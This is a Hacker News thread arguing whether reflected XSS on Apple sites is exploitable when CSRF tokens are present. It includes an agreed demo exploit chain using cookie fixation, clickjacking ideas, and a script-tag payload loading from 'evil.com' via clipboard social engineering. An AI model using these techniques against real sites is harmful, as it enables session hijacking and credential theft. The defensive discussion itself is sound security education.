Hacker News new | past | comments | ask | show | jobs | submit login

A page that lets you run arbitrary JavaScript in your own browser is not automatically vulnerable . For it to be a vulnerability you must be able to run arbitrary JavaScript in someone else's browser. If these pages protect against CSRF, most of them aren't vulnerable, expresslane being one case where I think you could get the JS to someone else without CSRF.



If the arbitrary JS is specified by a specially crafted URL or form POST, you can make the JS execute in someone else's browser as easily as getting someone to click on a very innocent-looking link.

And as soon as you can get someone to execute arbitrary JS on a particular domain, any CSRF protection will be useless because you practically control their browser. (You can even literally control their browser, if you use BeEF http://www.bindshell.net/tools/beef.html )

You can even completely hide the XSS happening by loading it into an invisible IFRAME, while the main page keeps the victim's attention occupied by playing the promised video of a cute kitten playing with a ball of string.


Could you demonstrate that for me please?

Here's a simple little page that is vulnerable to XSS but not to CSRF:

http://brlewis.com/demo/xss-csrf.html

It works by GET or POST, so it should only take you a minute to craft a link that you can post right here in HN that makes that page pop an alert up in my browser.


This should work: http://mkjon.es/xss.html (note that your server seems to hang if I put "<script>" in the GET params, but assuming that works and thus the page is vulnerable to XSS like you intended, then this works). Just pretend the <img /> tag is a script tag.

Of course, this is kind of cheating - I exploit the fact that there's a CSRF bug on your web site. But that's kind of the point - just saying "oh well this is an XSS but it doesn't matter because this other unrelated thing prevents it" is bad security. It's entirely possible, even likely, that someone will come along at a later date and change that other seemingly-unrelated thing, having no idea that they're introducing a security hole in the process.


Cool! I'll look into the CSRF bug. EDIT: Using a vulnerability in another demo page definitely is cheating. But I do like the hack.

To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.

EDIT 2: There was another demo on my server that let you set arbitrary cookies. This exploit relied on setting the JSESSIONID cookie. If a similar exploit existed on Apple's web site, presumably this would defeat the purpose of the exploit, since the target user would no longer be authenticated as him/herself. I changed the cookie demo not to allow arbitrary cookie names, just to prevent it interfering with other demos.


> To be clear, "oh well this is an XSS but it doesn't matter" is not something I ever said. I only ever said that most of the screenshots in the article don't by themselves demonstrate a vulnerability on Apple's web sites.

True, they may require some clever hacking to really exploit.

But experience has shown me that (way) more often than not, even though an XSS might not be directly exploitable, there will be further (perhaps not so critical) security problems that will lead to an exploit, given an at-first-sight-not-so-exploitable XSS.

So it's always a better idea to make sure the XSS is not there in the first place, because if someone figures out a way to leverage it, they'll have full control over a visitor's browser on that domain.

Maybe the innocent flaw that allows the exploit isn't even there yet at first, but gets added accidentally with later development. It's still the XSS that is the most critical problem.


Sorry, didn't mean to put words in your mouth. I just wanted to point out that even when it seems like an XSS doesn't demonstrate a vulnerability, some of your assumptions may be wrong and it actually does.

Security is hard, let's go shopping!


Then I think we agree: These examples might or might not be vulnerabilities, though from appearances two of them seem very likely to be.


Maybe next time you can leave the bug in there and just copy the demos to a new set with the fixes? Because I'd like to have seen how this worked, except it no longer works :)


Oh, sorry. Basically he had another endpoint that let you set an arbitrary cookie to an arbitrary value (with no csrf protection).

So first I had it hit that endpoint, setting the JSESSIONID cookie to my value (off of which the csrf token is keyed). Then I had it redirect to an xss'd page with my csrf token, which it would see as valid because it matched the (forced) JSESSIONID.


It however would be odd for GET requests to contain anti-CSRF token. In such case, users cannot pass any links that have any parameters and the session-specific token to others. This seems completely defeat the purpose of GET requests.


Ooh, that's a good one. When I said that, I wasn't thinking about the CSRF token being required with the XSS-able form. So yeah, that partially mitigates the problem.

It can still be done, however. But it'll take more than a few minutes, because I have only read about and played with PoCs of the relevant attacks, never implemented one like that myself.

One approach is "clickjacking". It involves putting your page in an IFRAME that is 100% alpha transparent, in a containing page. This is positioned over an image that says "CLICK TO PLAY" (or something) in such a way that the (invisible) button on your page aligns with the image. When you click the image, you're actually clicking the button on your site. Javascript in the containing page monitors when this happens and when it does, it can read the CSRF token from the URL that the IFRAME now points to. Once it knows the token, the XSS attack is straightforward.

Now this only works because your form submits the CSRF token via a GET request, so I can read it from the URL. If your form would only accept a POST request, I'm not entirely sure of how I'd do it. I need to think about that for a little while longer, it's an interesting challenge, though. There are some (IMO) far-fetched clickjacking-like attacks that require some social engineering (of the containing page) to get the user to perform certain actions that could do it. One way is to wrap a viewsource: URL to your page in an IFRAME (only works in Firefox, afaik) and position and dress it up so that only the CSRF token is visible and it looks like a CAPTCHA. The user would enter the CAPTCHA/CSRF and then XSS is possible. But that's not very elegant, and I'm not entirely sure if Firefox still allows doing this. Also it's not guaranteed to succeed if the user can't be bothered to enter a CAPTCHA to see the cute kitten video.

So in that case I'm not sure. One surefire way to prevent these and related clickjacking-style attacks is to put some framebusting JS code in your site. Twitter does this to prevent clickjacking to autosubmit a those pre-filled tweet form. Check their sourcecode, the way they do it is pretty thorough (even taking into account race conditions that might cause the submit click to go through just before the frame is busted).

I'm going to have to think about this for a while (how to do it if it were a POST form, that is. I'm fairly sure I could get the GET variant to work easily--I hope you could follow that example). The way you put a CSRF token in that form definitely makes it non-trivial, though.

(BTW for anyone else to attempt a shot at this: the CSRF token is not actually the same value every time, but random generated and fixed with the session cookie, so clear your cookies before you try your brilliant exploit)


I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.

However, a variant of the later attack you describe would work. You could get the user to click on a flash app on your page, which copies <script src="http://evil.com/script.js /> to your clipboard, then "click on the box below and press ctrl-v, then enter.". The box below would of course be the one on the XSSable page, and when the user hit enter, it would submit the form and load up the second page, XSSing the user.

This sounds far-fetched, but I've seen successful attacks like this in the wild.


> I don't think the particular clickjacking attack you suggest would work - you cannot read document.location on an iframe if that iframe has a different origin.

Ok--I wondered about that. But I figured BeEF has that capability so it must be possible somehow. At least, as far as I understand BeEF loads the page in a fullscreen IFRAME controlling the browser from the containing page. Guess I was wrong.

No other way to pull it off? Cause the token is right there in the URL, it's gotta be leaked somewhere ... :-)


I'm not that familiar with BeEF, but it is possible to set the location on child iframes, just not get it.

It also looks like BeEF is running on your local machine, so they could presumably do whatever they want to bypass the browser's security model.


Both of those attacks fail if the page protects itself against CSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery#Prev...


You can initiate an XSS attack without making any cross site requests. Being able to launch a CSRF attack, is not a prerequisite for being able to launch an XSS attack. It does help though.


If I didn't know that, my original post would have said that all the Apple pages would be invulnerable if they prevented CSRF. I think the expresslane page is one where data could go in the database and others could see it.

CSRF is not a prereq in general, but it is a prereq for the attacks tripzilch listed.


A simple example: you can pass a link to someone and have some javascript that submits form for them without them knowing.


You could "share" link with your own javascript embedded in it that reads cookies and sends them to your logging server. Or customize the website so that when somebody types their password, it sends it to your logging server. If you can run custom javascript on a page, it's a security problem.


It might sound trivial, but on many systems it can lead to serious privilege escalation and expose huge vulnerabilities further up in the chain. Check out the case study below for an example in real world.

http://mobile.eweek.com/c/a/Security/Hackers-Hit-Apacheorg-C...

Also, if you want to learn more about avoiding these issues, OWASP is one of the best sources out there.

https://www.owasp.org/index.php/Main_Page


That attack fails if the page prevents CSRF: http://en.wikipedia.org/wiki/Cross-site_request_forgery#Prev...


Not necessarily. Typical CSRF implementations prevent the server from accepting inputs coming from an "unauthorized" page. This might or might not prevent XSS from being triggered on the client side.

XSS can propagate to other users via database rather than HTTP requests.

In general, you should prevent attacks in one-by-one manner. Hoping that one security mechanism will accidentally fix other issues will result in design that is insecure, convoluted and hard to reason about. Remember: you have to prevent all attacks. Attackers only need to find one vulnerability to attack. Therefore, any kind of complexity in design works to their advantage.


Exactly, defense in depth is the name of the game.

An example of a defense in depth strategy:

Layer 1: Customer runs a WAF (web app firewall) to do some CSRF and XSS mitigation

Layer 2: App contains its own intrusion detection system that preprocesses all requests for "typical" SQL injection, CSRF and XSS attacks and prevents the rest of the code from executing if this is the case. I'm using PHP-IDS for this.

Layer 3: every request to the server must submit an anti-CSRF token and is immediately refused if it does not do so.

Layer 4: Business logic contains its own positive input validation (all input must be in the expected format), and prevents the rest of the code from executing if the input is not valid. This is meant to prevent XSS and SQL injection when data enters the system.

Layer 5: all DB requests use parameters instead of concatenating variables into queries to mitigate the risk of SQL injection.

Layer 6: All output is encoded to prevent XSS attacks when data leaves the system.

In such a solution you can have a security issue in one of the layers and still have a system that is secure.


Exactly. Don't defend from XSS by implementing CSRF defences. Defend from XSS by making sure you properly encode every piece of data that enters your web page. Then add CSRF on top, to prevent third party sites from initiating "clicks" on your page. Then implement Content-Security-Policy to help defend against programmer mistakes which leave CSRF/XSS holes open.


I agree that XSS can propagate to other users via database...I'm pretty sure the expresslane example is a real vulnerability for that reason. But note that the grandparent post was not describing an attack via the database.

I am not hoping that CSRF prevention will make everything OK on the Apple website (which I have no affiliation with, by the way). Nor am I saying XSS prevention is not worthwhile. I'm merely pointing out that this blog post is not demonstrating 11 vulnerabilities in Apple's web site. There might actually be 11 vulnerabilities, but the blog post doesn't give enough information for us to know.


Not if the page simply a normal page that you would type in your URL. CSRF doesn't make sense there. I could send you a link to facebook.com with an embedded script.


If the page accepts URL parameters or POST data, CSRF makes perfect sense.


> If the page accepts URL parameters … CSRF makes perfect sense.

No, it doesn't.

CSRF makes perfect sense when there is data on the server that is being modified by a request. A simple "search.php?query=…" doesn't need CSRF protection.

If you're passing parameters that modify the server in the URL (instead of a part of the post data) you're using HTTP wrong and adding CSRF protection in the query string is the wrong solution.


You're right about the search example. That doubles the list of demonstrated vulnerabilities in this article from 1 to 2.

I certainly agree that using GET for changing server state would be wrong. I don't know if any of the examples in the article work that way, since all we're provided with is a screenshot with an alert box. That's demonstrated sloppiness on Apple's web site, but not enough information to demonstrate vulnerability.

(I'm definitely voting up your reply for intelligent discussion.)


These screenshots show pretty textbook reflected XSS vulnerabilities, so I don't see why you think there's a CSRF vulnerability required for an exploit. Most of the targets are innocuous operations that aren't modifying any persistent state, so they wouldn't normally have CSRF protection. In particular, the search queries all appear to support direct-linking (notice the query string), which means they can't employ CSRF mitigations (because it would break the links).


Yes, the search query string is one where CSRF prevention would be out of place. Most of them, though, are intermediate results in a user-specific interaction where CSRF prevention wouldn't break anything. There are a lot of web frameworks out there; some of them likely do CSRF prevention by default. From this article we can definitely conclude that Apple web sites are sloppy in 11 places, but there's not enough information to say there are 11 vulnerabilities.


I'm getting the impression you don't entirely understand how CSRF exploits and mitigations work. Things like CSRF cookies are intended to protect persistent state at the server. I don't think I've ever seen CSRF mitigations used to gate response output. And to be honest, it doesn't sound like a good strategy because it wouldn't necessarily protect the target from exploit. You're still likely to have other vectors of bypassing a CSRF protection used in such a manner.


Your impression is entirely mistaken. I do entirely understand CSRF exploits and mitigations. I think what's happening is that when I write "not a demonstrated vulnerability" you (and others) are reading "a fine and dandy example of web programming". That's why phrases like "doesn't sound like a good strategy" keep popping up in your reply and others when I'm not talking about recommended strategy.

When I wrote my first comment, this story was at the top of the front page. A story about 10 demonstrated vulnerabilities on Apple's web sites would belong there. A story about 2 demonstrated vulnerabilities and 8 instances of sloppiness that might be vulnerabilities but we don't know without more information -- that's not really a top-of-the-front-page story.


You're arguing the existence of a mitigation strategy that's extremely unlikely and not at all evidenced by the information available. So, it's not that I (or anyone else as far as I can tell) took your statements as more than they are. It's just that your basic premise is highly questionable at best. It's not strictly impossible, but it is based on extraordinary assumptions lacking any extraordinary evidence to support them.


(come on people, what's with all the downvotes? this is an interesting discussion! maybe the premise is incorrect but the answers are super informative)

Hey brlewis, even though we haven't managed to (completely/reliably) crack your CSRF example YET ... I hope you agree that it's better to not have an XSS in the first place rather than rely on CSRF to make it (way) more difficult, right?


Agreed. The screenshots in the article show bugs that should be fixed whether or not they're currently exploitable. And they might even be currently exploitable...more info needed.




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: